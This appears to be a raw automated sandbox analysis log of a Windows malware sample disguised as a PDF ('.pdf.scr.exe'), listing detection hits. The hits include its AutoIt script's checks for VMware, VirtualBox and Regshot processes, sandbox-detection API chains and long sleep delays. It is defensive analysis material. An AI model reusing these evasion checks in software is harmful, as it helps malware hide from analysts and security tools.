      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Yara detected AntiVM autoit script
      Source: Yara matchFile source: 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: itugx.exe, 00000017.00000003.533363458.0000000000D07000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.529712010.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.534973802.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.536173123.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000002.542096662.0000000000D2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXESW
      Source: itugx.exe, 00000015.00000003.505153695.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000002.512758146.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506047618.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.508004868.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506688814.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506384568.0000000001356000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXEQ
      Source: itugx.exe, 00000005.00000003.410793804.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.452549594.00000000014CB000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.450945660.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.452340975.00000000014C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")#
      Source: itugx.exe, 00000017.00000003.533363458.0000000000D07000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.529712010.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.534973802.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.536173123.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000002.542096662.0000000000D2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXED
      Source: itugx.exe, 00000002.00000003.386800246.0000000000E02000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.410540336.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400635217.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.440840027.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.439624886.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.468989814.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.461712871.00000000013C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")
      Source: itugx.exe, 0000001C.00000003.541378375.00000000012E5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000003.541599351.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")<
      Source: itugx.exe, 00000010.00000002.470477695.00000000013CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")44V$
      Source: itugx.exe, 0000001C.00000003.541378375.00000000012E5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000003.541599351.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN?8CJ
      Source: itugx.exe, 00000019.00000003.565987603.000000000195C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000019.00000003.565769789.000000000195C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000019.00000003.563164824.0000000001959000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000019.00000002.569636959.000000000195C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000019.00000003.567142794.000000000195C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXE=
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.0000000007390000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp, wscript.exe, 0000001B.00000002.537175124.0000025B9CBDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.533357927.0000025B9CBBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.533720665.0000025B9CBDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ORIGINALFILENAMEAUTORUNS.EXEL,
      Source: wscript.exe, 0000001B.00000002.536000753.0000025B9CBBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.533357927.0000025B9CBBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: LFILENAMEAUTORUNS.EXEL,
      Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXEL~
      Source: itugx.exe, 00000002.00000003.397098361.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.389382633.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.369716492.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412647234.0000000000E3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THENXJ\
      Source: itugx.exe, 00000005.00000003.452396525.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.410793804.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455207897.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.450945660.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451302859.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451585020.00000000014D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN-
      Source: itugx.exe, 00000010.00000002.470505280.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.440840027.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.439624886.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.469351165.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.465307309.00000000013D1000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467780564.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.461712871.00000000013C4000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.465193535.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467653750.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.507346397.00000000012C0000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.509588017.00000000012C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
      Source: itugx.exe, 00000002.00000003.400023583.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.399006405.0000000000E96000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412932307.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.396010910.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400917680.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451422910.0000000001568000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455510913.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451597738.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467505109.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000002.470674080.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.466572234.0000000001469000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXES
      Source: itugx.exe, 00000002.00000003.400023583.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.399006405.0000000000E96000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412932307.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.396010910.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400917680.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451422910.0000000001568000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455510913.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451597738.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467505109.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000002.470674080.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.466572234.0000000001469000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXE
      Source: itugx.exe, 00000015.00000003.467653750.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467286288.0000000001295000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.505153695.00000000012B4000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.509289794.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.509361220.00000000012BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")L
      Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXESUY;`D
      Source: itugx.exe, 00000015.00000003.505153695.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000002.512758146.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506047618.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.508004868.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506688814.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506384568.0000000001356000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXES.
      Found API chain indicative of sandbox detection
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_2-94491
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5904Thread sleep count: 64 > 30Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5904Thread sleep count: 61 > 30Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 748Thread sleep count: 52 > 30Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 748Thread sleep count: 89 > 30Jump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 1916Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 4028Thread sleep count: 33 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 4028Thread sleep count: 56 > 30
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 4136Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5916Thread sleep count: 54 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5916Thread sleep count: 96 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5460Thread sleep count: 60 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5460Thread sleep count: 83 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5596Thread sleep count: 45 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5596Thread sleep count: 82 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 1920Thread sleep count: 64 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 1920Thread sleep count: 55 > 30
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeLast function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeWindow / User API: threadDelayed 9667Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeWindow / User API: foregroundWindowGot 455Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeAPI coverage: 5.3 %
      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeAPI call chain: ExitProcess graph end nodegraph_0-25164
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
      Source: itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VMwaretray.exe") Then#
      Source: itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then
      Source: itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then=
      Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Thena46
      Source: itugx.exe, 00000005.00000003.452233476.00000000014AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe
      Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe\Microso
      Source: itugx.exe, 00000005.00000003.452233476.00000000014AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe65687
      Source: wscript.exe, 00000001.00000002.363558819.0000000002F60000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: en-USenVMware.VMware.vmuiData\Local\Temp\Folder8_410\itugx.exe89
      Source: wscript.exe, 0000000D.00000002.421779421.000001EDEF160000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: tBC:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe\??\C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exeen-USenVMware.VMware.vmui-----------------------------------------
      Source: rnnsh.xls.0.drBinary or memory string: If ProcessExists("VMwaretray.exe") Then
      Source: itugx.exe, 00000015.00000003.509119527.0000000001299000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exeipt.S
      Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VMwaretray.exe") Then
      Source: itugx.exe, 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: name="VMware.VMware.vmui"
      Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Thenj0
      Source: itugx.exe, 00000010.00000003.468344244.0000000001412000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwaretray.exe^`DE$
      Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Thenk5q
      Source: wscript.exe, 00000016.00000002.491522356.0000021FFC240000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe\??\C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exeen-USenVMware.VMware.vmui-----------------------------------------
      Source: itugx.exe, 00000017.00000003.539485403.0000000000CD1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwaretray.exe
      Source: itugx.exe, 00000015.00000003.467286288.0000000001295000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
      Source: itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then"
      Source: rnnsh.xls.0.drBinary or memory string: If ProcessExists("VboxService.exe") Then
      Source: wscript.exe, 00000001.00000003.361367465.00000000036F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware.VMware.vmuiData\Local\Temp\Folder8_410\itugx.exew
      Source: itugx.exe, 00000015.00000003.509119527.0000000001299000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe6BA444D6.
      Source: itugx.exe, 00000010.00000003.469045500.00000000013AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe3A765687
      Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe536C7
      Source: itugx.exe, 00000002.00000003.409778317.0000000000E4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwaretray.exeS
      Source: itugx.exe, 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: <description>"VMware Workstation"</description>
      Source: itugx.exe, 00000002.00000003.397098361.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.389382633.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.409778317.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451315387.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.452100532.0000000001510000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451193951.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451994345.000000000150D000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.462893753.00000000013F8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.461712871.00000000013F8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.468154413.000000000140E000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.465422358.00000000013FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exe
      Source: itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
      Source: itugx.exe, 00000005.00000003.451994345.000000000150D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwaretray.exen*
